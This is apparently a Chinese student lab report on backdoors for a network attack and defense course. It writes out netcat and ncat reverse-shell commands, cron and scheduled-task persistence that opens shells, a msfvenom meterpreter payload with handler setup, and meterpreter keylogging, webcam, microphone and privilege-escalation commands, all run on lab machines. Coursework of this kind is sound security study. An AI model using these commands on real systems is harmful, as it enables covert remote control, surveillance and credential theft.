zoukankan      html  css  js  c++  java
  • 2018-2019-2 网络对抗技术 20165228 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165228 Exp2 后门原理与实践

    (1)例举你能想到的一个后门进入到你系统中的可能方式?
    在使用盗版软件,盗版系统,甚至游戏外挂时,往往会让我们关闭杀毒软件,此时后门植入系统就太轻松了。
    (2)例举你知道的后门如何启动起来(win及linux)的方式?
    win:任务计划启动
    linux:通过cron启动
    (3)Meterpreter有哪些给你映像深刻的功能?
    无论是截屏,拍照,还是录音,都会泄露隐私,特别是击键记录,盗取账号密钥十分容易。
    (4)如何发现自己有系统有没有被安装后门?
    通过查阅任务计划以及进程里是否有可疑项,安装杀毒软件也是一种方式。

    实验前先查看win和linux的IP地址便于后面的实验。

    Linux:192.168.199.128
    Win7:192.168.199.229

    学习ncat的使用

    1.Win获得Linux Shell

    • Win7打开cmd命令行,在ncat解压目录下,输入ncat.exe -l -p 52285228端口进行监听
    • 在Linux终端输入nc 192.168.199.229 5228 -e /bin/sh反弹连接Win75228端口
    • Win7已获得Linux shell,输入ls验证结果

      成功

    2.Linux获得Win Shell

    • Linux下打开一个终端,输入nc -l -p 52285228端口进行监听

    • 在Win7命令行输入ncat.exe -e cmd.exe 192.168.199.128 5228反弹连接Linux5228端口

    • Linux已获得Win7 shell,输入dir验证结果

    成功
    3.使用nc传输信息

    • Win7命令行输入 ncat.exe -l 5228监听5228端口

    • Linux终端输入nc 192.168.199.229 5228反弹连接Win75228端口

    • 建立连接后可互传信息

    4.使用nc传输文件

    • Win7命令行输入 ncat.exe -l 5228 > 2.txt监听5228端口,并设置收到的文件重定向保存到2.txt

    • Linux终端输入nc 192.168.199.229 5228 < 1.txt反弹连接Win75228端口

    • Win7可收到Linux发来的文件。

    实验内容

    任务一:使用netcat获取主机操作Shell,cron启动

    1、设定cron
    Cron是Linux下的定时任务,每一分钟运行一次,根据配置文件执行预设的指令。详细说明可以"man cron"。

    • Win7中打开对端口5228端口的监听。
      ncat.exe -l -p 5228
    • Linux下使用crontab -e指令增加一条定时任务,-e表示编辑
    • 选择3,即编辑器。
      根据 m分钟 h小时 dom日期 mon月 dow周几 command执行的命令的格式添加最后一行33 * * * * /bin/netcat 192.168.199.229 5228 -e /bin/sh

    保存退出

    • 结果验证:Win7得到Linux Shell

    任务二:使用socat获取主机操作Shell, 任务计划启动

    1、新建任务计划

    • 原理: 在主控机的nc打开对5228端口的监听时,受控机的每一次锁定时都会启动ncat,相当于在cmd执行ncat.exe -e cmd.exe 192.168.199.128 5228,从而反弹连接到Linux。即Linux得到Win7 shell。
      新建触发器:当锁定任何用户的工作站时

    新建操作:
    启动程序:socat所在路径socat.exe
    添加参数:tcp-listen:5228 exec:cmd.exe,pty,stderr

    2、锁定计算机,让该任务计划运行。再次唤醒计算机,可以看到刚新建的任务已启动,

    3、Linux终端输入socat - tcp:192.168.199.229:5228,结果验证:Linux得到了Win7 shell

    任务三:使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

    • 在Linux终端执行msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168. 199.128 LPORT=5228 -f exe > 20165228_backdoor.exe生成后门程序20165228_backdoor.exe

    • Win7下执行ncat.exe -l 5228 > 20165228_backdoor.exe监听5228端口,并将收到的文件重定向保存到20165228_backdoor.exe

    • Linux终端执行nc 192.168.199.229 5228 < 20165228_backdoor.exe反弹连接Win7并传输文件20165228_backdoor.exe

    • Linux终端执行msfconsole命令,并设置好IP地址和端口号

    msf > use exploit/multi/handler
    msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
    payload => windows/meterpreter/reverse_tcp
    msf exploit(handler) > show options
    

    • 执行监听

    • Win7运行后门程序

    • Linux平台的监听进程将获得Win主机的主动连接,并得到远程控制shell。

    任务四:使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

    • record_mic录制一段音频

    • webcam_snap使用摄像头拍照

    • keyscan_start开始记录击键,keyscan_dump读取记录

    • screenshot进行截屏

    • getuid查看当前用户并执行getsysyem进行提权操作

    实验中遇到的问题

    1、我尝试过用Linux监听端口,Win7反弹连接Linux却提示由于目标计算机积极拒绝,无法连接
    解决:尚未解决
    2、在最后getsystem获取权限时失败
    解决:在尝试一些博客中的方法后,发现好像还是不行,但是了解到了msf使用的是自带的提权方法,只尝试了4个payload,所以大部分都会失败。

    实验感想

    • 此次实验的内容让我十分感兴趣,仅仅通过一些简单的指令就可以实现shell权限的获取,也让我明白了信息安全的重要性,特别是在尝试录音、拍照、截屏等操作后,让我认识到信息的泄露太可怕了。这让我更加想要学好网络攻防这门课,深入了解和掌握这些技能。
  • 相关阅读:
    start tag, end tag issues in IE7, particularly in xslt transformation
    用SandCastle为注释生成chm文档
    Firebug
    架构的重点
    Linux Shell常用技巧(十) 管道组合
    Linux JDK升级
    Linux Shell常用技巧(十二) Shell编程
    Packet Tracer 5.0实验(一) 交换机的基本配置与管理
    Linux Shell常用技巧(六) sort uniq tar split
    Linux Shell常用技巧(二) grep
  • 原文地址:https://www.cnblogs.com/cloud795/p/10568205.html
Copyright © 2011-2022 走看看